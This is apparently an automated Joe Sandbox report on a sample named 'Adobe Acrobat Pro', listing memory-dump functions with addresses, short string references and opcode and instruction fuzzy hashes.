Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: /$~
API String ID: 0-2315609426
Opcode ID: df2d274804372e79d3638643d822383c4e96f3ed6188905e0afd5c7d91a3034d
Instruction ID: efd49c20086923763399c9a6531cfbba8b16df0f9e428016600d1711cddde0a0
Opcode Fuzzy Hash: df2d274804372e79d3638643d822383c4e96f3ed6188905e0afd5c7d91a3034d
Instruction Fuzzy Hash: CA310536518B424BD705DB38D4904EBB7E1EFC2324F71AA3C80E1872A5DB39605AEF16

Uniqueness

Uniqueness Score: -1.00%

Function 1ADBB6B9 Relevance: 2.6, Strings: 2, Instructions: 84COMMON

Download Yara Rule

Strings

e, xrefs: 1ADBB78B
a, xrefs: 1ADBB6BB

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: a$e
API String ID: 0-2053377140
Opcode ID: 063a48b88fdee2665afe95e4158cae3a85d9e6ee491d6182ed4268e69b845113
Instruction ID: 011eb44d8c089bdd6a4667fe02c79aa99391a958825773f621d67393e8e7ccd7
Opcode Fuzzy Hash: 063a48b88fdee2665afe95e4158cae3a85d9e6ee491d6182ed4268e69b845113
Instruction Fuzzy Hash: 14312271108B024FD719DF28C8A08A7B7E6EBC6310F558ABDD992872D5DB34A50ADB81

Uniqueness

Uniqueness Score: -1.00%

Function 1CA4DCCC Relevance: 2.6, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

:, xrefs: 1CA4DDA0
*, xrefs: 1CA4DD93

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CA4B000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CA4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca4b000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: *$:
API String ID: 0-4252967472
Opcode ID: 0c0a1bd8167f103ff9f741ec6e2414160d8c1cf698a7e160c9f0e7ef745fffcb
Instruction ID: b4039f5902d0102d9da1b409ee7a67ce496996be5cf55b9fdb325fc8c41ad569
Opcode Fuzzy Hash: 0c0a1bd8167f103ff9f741ec6e2414160d8c1cf698a7e160c9f0e7ef745fffcb
Instruction Fuzzy Hash: A2219C392047028BD719EEB8D9044EB33E2EFC5314F916A3CC586C7684EB29A41ADB56

Uniqueness

Uniqueness Score: -1.00%

Function 1CF1D9EF Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

-, xrefs: 1CF1DA04
G, xrefs: 1CF1DA0F

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CF1D000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CF1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cf1d000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: -$G
API String ID: 0-3598989620
Opcode ID: 80495236ed1b970c9cd8be67959b183dfdbeb88cc364cb5ba3fe0f99faa1916f
Instruction ID: aad2035d23fb0a6dbec700d5755f972e32561e3e5c90fb2f210541345c380c79
Opcode Fuzzy Hash: 80495236ed1b970c9cd8be67959b183dfdbeb88cc364cb5ba3fe0f99faa1916f
Instruction Fuzzy Hash: 3F314675508B828FC329EF38C4915D677E1FFC5310B509A2C91A6872E8E7796429CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1AD66318 Relevance: 2.6, Strings: 2, Instructions: 79COMMON

Download Yara Rule

Strings

", xrefs: 1AD66411
Q, xrefs: 1AD66399

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001AD5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1AD5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: "$Q
API String ID: 0-688704344
Opcode ID: 1307b9ae836439c4ce931dac7b4c9a1767f49d01d4fd73b7bfb22838c6a05baa
Instruction ID: faa55f1f6b0d4d1ca73352e731421be76c8f4ebea6dc05d581cdf6eaff938798
Opcode Fuzzy Hash: 1307b9ae836439c4ce931dac7b4c9a1767f49d01d4fd73b7bfb22838c6a05baa
Instruction Fuzzy Hash: A0310375508B128BD718EF2EE444AAAB3E2FFC1300FA49A7EC1898B155D7352525CF02

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A2F85 Relevance: 2.6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

6A, xrefs: 1B3A2FFA
&, xrefs: 1B3A3011

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: &$6A
API String ID: 0-329130417
Opcode ID: e695e91fd51490c9777e687ff2d68138ad00d2a6a383bdddadc05f6a33a4cf82
Instruction ID: 34bb7bbcc4490c3aaee1c95f5158b271e2ee6abe390d06071704165f41cb6b3c
Opcode Fuzzy Hash: e695e91fd51490c9777e687ff2d68138ad00d2a6a383bdddadc05f6a33a4cf82
Instruction Fuzzy Hash: 3421057564C7425ED71CDFA8E44686AF3E1EFC5320FA4893ED196CA1D0EB7460068A4A

Uniqueness

Uniqueness Score: -1.00%

Function 1ADB82B6 Relevance: 2.6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

F, xrefs: 1ADB8379
>, xrefs: 1ADB8300

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: >$F
API String ID: 0-3219330187
Opcode ID: 4e8eaab3be44c3ff2ecd5d5fa7ec2826be6089b0c038889d584908f994528d23
Instruction ID: 471a8ee31831bf00b9eb97ad313a4846714470b1e3aa6a842efa5c1cc6306473
Opcode Fuzzy Hash: 4e8eaab3be44c3ff2ecd5d5fa7ec2826be6089b0c038889d584908f994528d23
Instruction Fuzzy Hash: 202187381087518FC715EF24C0518EBB7E2EFC5310F68DA2D94E1C728ADB38A40ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C399F Relevance: 2.6, Strings: 2, Instructions: 74COMMON

Download Yara Rule

Strings

+, xrefs: 1B3C39DF
%, xrefs: 1B3C39BE

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: %$+
API String ID: 0-2626897407
Opcode ID: 25e65f4e56805401fc49098dfff9cb35dac7b2f8299f7b5a33988837c70cf2de
Instruction ID: 2da184fed904089263336f638bbebd94cd65c4f8b51b9610322a13a9549f7ad0
Opcode Fuzzy Hash: 25e65f4e56805401fc49098dfff9cb35dac7b2f8299f7b5a33988837c70cf2de
Instruction Fuzzy Hash: 653147396087428BC318EB24E1914FBB7E1EFD1318F606A2DC4D78B594DB3A751ACB45

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C59C8 Relevance: 2.6, Strings: 2, Instructions: 74COMMON

Download Yara Rule

Strings

D, xrefs: 1B3C5A90
>, xrefs: 1B3C5A40

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: >$D
API String ID: 0-1374516647
Opcode ID: eac2734d567cc78296a1d9a12b3bb366d9a2d1e834aeece1ef145dfc375eaed2
Instruction ID: a72df8d7559b679c787d5665b660b4cdc8fb0fe9a3db0f027fecba3d834a7074
Opcode Fuzzy Hash: eac2734d567cc78296a1d9a12b3bb366d9a2d1e834aeece1ef145dfc375eaed2
Instruction Fuzzy Hash: 5921BE1521CB230BCB10EB35D8141EBBBD5EBDA314FB4A63CC0E2870E2D5285149E707

Uniqueness

Uniqueness Score: -1.00%

Function 1CC0C90D Relevance: 2.6, Strings: 2, Instructions: 74COMMON

Download Yara Rule

Strings

a, xrefs: 1CC0C9D2
!, xrefs: 1CC0C929

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: !$a
API String ID: 0-227755437
Opcode ID: cdecf1cc33dcfe211f3857aa66f60215aa726085b3e163d7aad6cc4b90f70dce
Instruction ID: 36f3c332239fdfb4814ff6fc25175d4b569dec74ec0b337aa5c85b1e88e079d0
Opcode Fuzzy Hash: cdecf1cc33dcfe211f3857aa66f60215aa726085b3e163d7aad6cc4b90f70dce
Instruction Fuzzy Hash: 4D31EE3610C7428BE708EF69E4985ABB3E2EF84314F20993EC5CAC6589E7759415CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 1B3AA7E4 Relevance: 2.6, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

#, xrefs: 1B3AA7FE
', xrefs: 1B3AA7F9

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: #$'
API String ID: 0-2443736422
Opcode ID: 28353012b02c8e352cbfab7e92381d1203080a620d7a4094bbbf2927309704ad
Instruction ID: 730b8cf8dff852656d7cff6b68ff82714779401512b1d4419ee37dfa0b5d9ffe
Opcode Fuzzy Hash: 28353012b02c8e352cbfab7e92381d1203080a620d7a4094bbbf2927309704ad
Instruction Fuzzy Hash: D121BF3520C7438BC729EF28E0905AAF7E2BFC9304F18DABEC4C58B292D6359555DB51

Uniqueness

Uniqueness Score: -1.00%

Function 1AD67AB7 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

\, xrefs: 1AD67AC1

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001AD5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1AD5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: 5cabd758cb4af409254ebb43cfe526c7a8f33e9175ce1f56710856c4af31357f
Instruction ID: fdaadac0e400a9902ea637272931fa663853264c31dbc159b260e99096e30ab4
Opcode Fuzzy Hash: 5cabd758cb4af409254ebb43cfe526c7a8f33e9175ce1f56710856c4af31357f
Instruction Fuzzy Hash: 8581DB3A1096528FD719DF3CD8806EAB7D2EBC5310F69863DD4D6CB2D1EB36950A8B40

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C285C Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

6, xrefs: 1B3C1053

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: b2f3a4e6a4d14e7d078e6b8666814b6180d3d0b72f8ea658b3d2984dd7016f3d
Instruction ID: aaea6d566a3cfd3f8acca584006c80b27d8d61203d23f0d77b60e2fbc6f60d9b
Opcode Fuzzy Hash: b2f3a4e6a4d14e7d078e6b8666814b6180d3d0b72f8ea658b3d2984dd7016f3d
Instruction Fuzzy Hash: 40816A34218B128FC319DF28D4809EBB3E5EFC9311F548A7DD0EA831A4EB34A526CB41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3ADC45 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

u, xrefs: 1B3ADE57

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: u
API String ID: 0-4067256894
Opcode ID: 61e4dcf8946f0ee13812b0fd47f0fac06e7882e3c4fd64dfe37675b666c56c4d
Instruction ID: 2019d543d2d08e41e3dda39d13498d528ccb9c872c6214a67e574eb41391b326
Opcode Fuzzy Hash: 61e4dcf8946f0ee13812b0fd47f0fac06e7882e3c4fd64dfe37675b666c56c4d
Instruction Fuzzy Hash: 53613F351087528FD315EF39D4804ABB3E2EFC5324F608BBEE4A58B599E734901ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 1D01C276 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

J, xrefs: 1D01C2BD

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001D019000.00000020.00000001.01000000.00000004.sdmp, Offset: 1D019000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d019000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: J
API String ID: 0-1141589763
Opcode ID: 93a814bcb06143253db091578f5347839872de8f7f37e6e0ff3cb225b875d57d
Instruction ID: 0aaff6263321b9d3964bd908fcf8b741ef41c9dbac9e79bbd299644bad1f05c6
Opcode Fuzzy Hash: 93a814bcb06143253db091578f5347839872de8f7f37e6e0ff3cb225b875d57d
Instruction Fuzzy Hash: 81517836508B168FC71CDF28D8C10FBB3E1EB86311B556A2ED4C7C7192EB28A50B9A55

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C0E71 Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

6, xrefs: 1B3C1053

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: 4949bf7c13f1dd8de362ad2e63e915995019dcbf68d9d77ea4df336168efd3f7
Instruction ID: 9265e3825b6d083b51e34274140540ba1d7083ede8a610a7bf737cf99f6e7daa
Opcode Fuzzy Hash: 4949bf7c13f1dd8de362ad2e63e915995019dcbf68d9d77ea4df336168efd3f7
Instruction Fuzzy Hash: CC715C35608B128BC719DF28D4908EBF3E5EFC9311F548A7DD0AA831A4DB38A526CB41

Uniqueness

Uniqueness Score: -1.00%

Function 1D020DC4 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

H, xrefs: 1D01F3B0

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001D019000.00000020.00000001.01000000.00000004.sdmp, Offset: 1D019000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d019000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 450e35e6951b29f2801c9daf03dcc08249a31d598893f818988d98aded97ad46
Instruction ID: c4aa824b6eb98edb983accbb076a9c52ee8dc992c9f1621181cfe20241f2584d
Opcode Fuzzy Hash: 450e35e6951b29f2801c9daf03dcc08249a31d598893f818988d98aded97ad46
Instruction Fuzzy Hash: F851443961CB028BD319DF29D4864EAB3E1FFC1300F109A2DC8C787595EB70A416CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 1B3AF6BC Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

G, xrefs: 1B3AF8D0

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: 34dddbe5a1ec9f4e40186f368d0a81281c183c404ecfa8c5236834e1e6c20d27
Instruction ID: b058df9126d6add9b3db10397dd5761a07c63808adf0923f50d5add7fe7c690a
Opcode Fuzzy Hash: 34dddbe5a1ec9f4e40186f368d0a81281c183c404ecfa8c5236834e1e6c20d27
Instruction Fuzzy Hash: 656132345087568BC709DF2CD4914EBB7E2EFCA310F548A6CE49AC72E4E6399519CB02

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A66DF Relevance: 1.4, Strings: 1, Instructions: 163COMMON

Download Yara Rule

Strings

C, xrefs: 1B3A1F0E

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: C
API String ID: 0-1037565863
Opcode ID: bd942aa45abf7df55f5829a1888c944ed12ecbd794fa725926517c76c787486c
Instruction ID: f5f8bdc94e6c44dc59360ccfcc93f41216e790658ee71889f2091ab64e31cec4
Opcode Fuzzy Hash: bd942aa45abf7df55f5829a1888c944ed12ecbd794fa725926517c76c787486c
Instruction Fuzzy Hash: C951733411CB438BC314EB38E5504E7B7E1EFD6320F64996ED0DAC7191E72A6425DB86

Uniqueness

Uniqueness Score: -1.00%

Function 1AD6990B Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

43/, xrefs: 1AD6998D

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001AD5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1AD5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: 43/
API String ID: 0-1154118653
Opcode ID: d0f5349703ee124fc52d9c83990715f8464e89684cf5a5a3d7b0415953dfa52d
Instruction ID: 102d213cdb6e5c5eb7b9e8ac7478e5fa2a8c6fe7f44fe86ff97fb206b9b45a88
Opcode Fuzzy Hash: d0f5349703ee124fc52d9c83990715f8464e89684cf5a5a3d7b0415953dfa52d
Instruction Fuzzy Hash: 895136352087028FD718EF38E4554ABB7E1EFC9324F618A2DD096876D1DB35A41ACB85

Uniqueness

Uniqueness Score: -1.00%

Function 1B398CAB Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

e, xrefs: 1B398E12

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: e
API String ID: 0-4024072794
Opcode ID: fad41879486fb2f7a5862004cef2720d75c54df589bf42be0c1e0d62159155ea
Instruction ID: 3384072fa0d4a55fbd5e7b95b312012f991e3148b071cf5ca6847f8e94dee0a0
Opcode Fuzzy Hash: fad41879486fb2f7a5862004cef2720d75c54df589bf42be0c1e0d62159155ea
Instruction Fuzzy Hash: EC51BC751046428BC71AEF38E4916EBB7E2EFC2315F94C76DC4828759ADB39A42BC740

Uniqueness

Uniqueness Score: -1.00%

Function 1B3957EC Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

b, xrefs: 1B3959BC

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: b
API String ID: 0-1908338681
Opcode ID: b9b045d4c57e59b85ec90390878b55f738caa29656b5f8700a8f879bf57ac8ad
Instruction ID: 25748786ab689207b95b33882c30d0f8f4b5b2aad392fbfd6c48a0d47c54a54a
Opcode Fuzzy Hash: b9b045d4c57e59b85ec90390878b55f738caa29656b5f8700a8f879bf57ac8ad
Instruction Fuzzy Hash: 205177382087029FC319EF38C4918ABB7E1EFC9314BA4CA2DD095C7294DB38E15ADB41

Uniqueness

Uniqueness Score: -1.00%

Function 1D06C200 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

F, xrefs: 1D06C385

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001D06A000.00000020.00000001.01000000.00000004.sdmp, Offset: 1D06A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d06a000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 950b8bbb17ca2c59a5858efd8e6faac5fbc9dbee6feda8259073a5757003b3a5
Instruction ID: f1a4598398ca79e30c66880a21835d06b74153eb86505f6d151f1fc2375e1a4a
Opcode Fuzzy Hash: 950b8bbb17ca2c59a5858efd8e6faac5fbc9dbee6feda8259073a5757003b3a5
Instruction Fuzzy Hash: D641AC3593CE290B972CCE6ADCD44B1B3D9F7D9752B18D72EC8D3871D6C92118038699

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B2DF9 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

e, xrefs: 1B3B2E16

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: e
API String ID: 0-4024072794
Opcode ID: e9ea55c48ccd739852ef72004ab0f625917091e0dad05771bf619818bce172e7
Instruction ID: 4a21c3c0687da6495cfd2bba073e442870a919d66b7b776fbd1e9ba3139c1742
Opcode Fuzzy Hash: e9ea55c48ccd739852ef72004ab0f625917091e0dad05771bf619818bce172e7
Instruction Fuzzy Hash: E55135251187068AC729DF39C8A11EBB3E5EBD5324F948B7E8582871DDEB79102AC741

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B4D0F Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

;x, xrefs: 1B3B4E15

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: ;x
API String ID: 0-599065801
Opcode ID: 5bc039d64df19634841cc644ed59b3223a1cd2e3b66ac061bc48777227aa50f7
Instruction ID: d8fc900ba01d2ff71be4ba7e8c578b6b344b41aa24c49427a7aaafc04c7649f0
Opcode Fuzzy Hash: 5bc039d64df19634841cc644ed59b3223a1cd2e3b66ac061bc48777227aa50f7
Instruction Fuzzy Hash: 4C513339118B5287D314EB3D98404EBB7E2FFC5351FA08A7DA499CB998EB319119CB01

Uniqueness

Uniqueness Score: -1.00%

Function 1CC9C1E3 Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

-, xrefs: 1CC9C25C

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: cb3a483d098f11fe4c880d9191607c31c8643d63197d38981815746b5887881e
Instruction ID: 59882e259fd6df23a4a60d4c5db6847cf6d291011805eaf3b86efda3550a9d4d
Opcode Fuzzy Hash: cb3a483d098f11fe4c880d9191607c31c8643d63197d38981815746b5887881e
Instruction Fuzzy Hash: C251347520C7428BC329EF28E4909ABF7E2EFCA310F248A3DD4C58B655D734A419CB56

Uniqueness

Uniqueness Score: -1.00%

Function 1D06B67B Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

E, xrefs: 1D06B697

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001D06A000.00000020.00000001.01000000.00000004.sdmp, Offset: 1D06A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d06a000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: d466726e82ea96ed002d1f1f14b933cbd855e7e2be535793c07d19a04cb263ae
Instruction ID: 23ba17bc53ea86ee7ecc7bd5e13d34f74e1f999d1b5897477733cd7702e0bdd1
Opcode Fuzzy Hash: d466726e82ea96ed002d1f1f14b933cbd855e7e2be535793c07d19a04cb263ae
Instruction Fuzzy Hash: AE41CB3511CB554BD31CDF2898800BAB7E2EBD5316F64DA3DC4E2872DAC6719407DB89

Uniqueness

Uniqueness Score: -1.00%

Function 1CEDD7C7 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

n, xrefs: 1CEDBE4B

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CED7000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CED7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ced7000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: n
API String ID: 0-2013832146
Opcode ID: ba345513f17c6755d2321633cd4735f929baf28a1c53bd6d8466f5016e5991b5
Instruction ID: 65655910f0de12a7cf376e1bd88521991e4ac46afde8450dc795c4e6db227620
Opcode Fuzzy Hash: ba345513f17c6755d2321633cd4735f929baf28a1c53bd6d8466f5016e5991b5
Instruction Fuzzy Hash: E9517634108A168BC318EB28D4A04EAB3E1FFC4361F609B7ED192CB9D4E7388156CF41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A7B6C Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

Y, xrefs: 1B3A7D09

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: Y
API String ID: 0-3233089245
Opcode ID: 6cd28bdd0df8ceb7b9755fb53b2eafd7a4ee378cfd206da03c45a95ce905c454
Instruction ID: 395ba796f1d41e26728a450cb0adbb43ece1b15da3e526cfe31096c4e3f5049d
Opcode Fuzzy Hash: 6cd28bdd0df8ceb7b9755fb53b2eafd7a4ee378cfd206da03c45a95ce905c454
Instruction Fuzzy Hash: CB51277000C7828BD709EF28E4604EBB7E1EFC6324F648A7DD0D587599EB35611ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 1CC9F3D0 Relevance: 1.4, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

E, xrefs: 1CC9F50D

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: d0c09df994439d5ecf873719da7c03c6e809b9053e1c03e522b37c577a74e5e4
Instruction ID: ff47a3cd9a431a676d53549043e41508a7425b632cfd491a644f66f7d683256f
Opcode Fuzzy Hash: d0c09df994439d5ecf873719da7c03c6e809b9053e1c03e522b37c577a74e5e4
Instruction Fuzzy Hash: 1651683110C7A24BD315EF3CA1545ABBBD1EFC1320F648A7ED4D5836E6DB69640ACB02

Uniqueness

Uniqueness Score: -1.00%

Function 1CA4B1BF Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

K, xrefs: 1CA4B1D5

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CA4B000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CA4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca4b000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: a2e3afa3c3aca3d206980920eb77f1750a7b2bdd41b7209ac3c5820d83096a23
Instruction ID: c14463252d4209d8b79a9fec0d946475042f95aed5c72f924ded801e2b598aca
Opcode Fuzzy Hash: a2e3afa3c3aca3d206980920eb77f1750a7b2bdd41b7209ac3c5820d83096a23
Instruction Fuzzy Hash: C741AB3404CF1A8FD728EE38D9401AAB3E1EBD1310F504B6EC8D6871D6EA346607CB95

Uniqueness

Uniqueness Score: -1.00%

Function 1AD62548 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

a, xrefs: 1AD626C9

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001AD5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1AD5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: a
API String ID: 0-3904355907
Opcode ID: ef4ffa65407e45edf435a4271980b8d4fc6ebbdb56d83feee7af74fb498b18fa
Instruction ID: 1580c327ea5b45e95bc8e5fd6f0f75610e559da5ad29bd670f53e986758dbd15
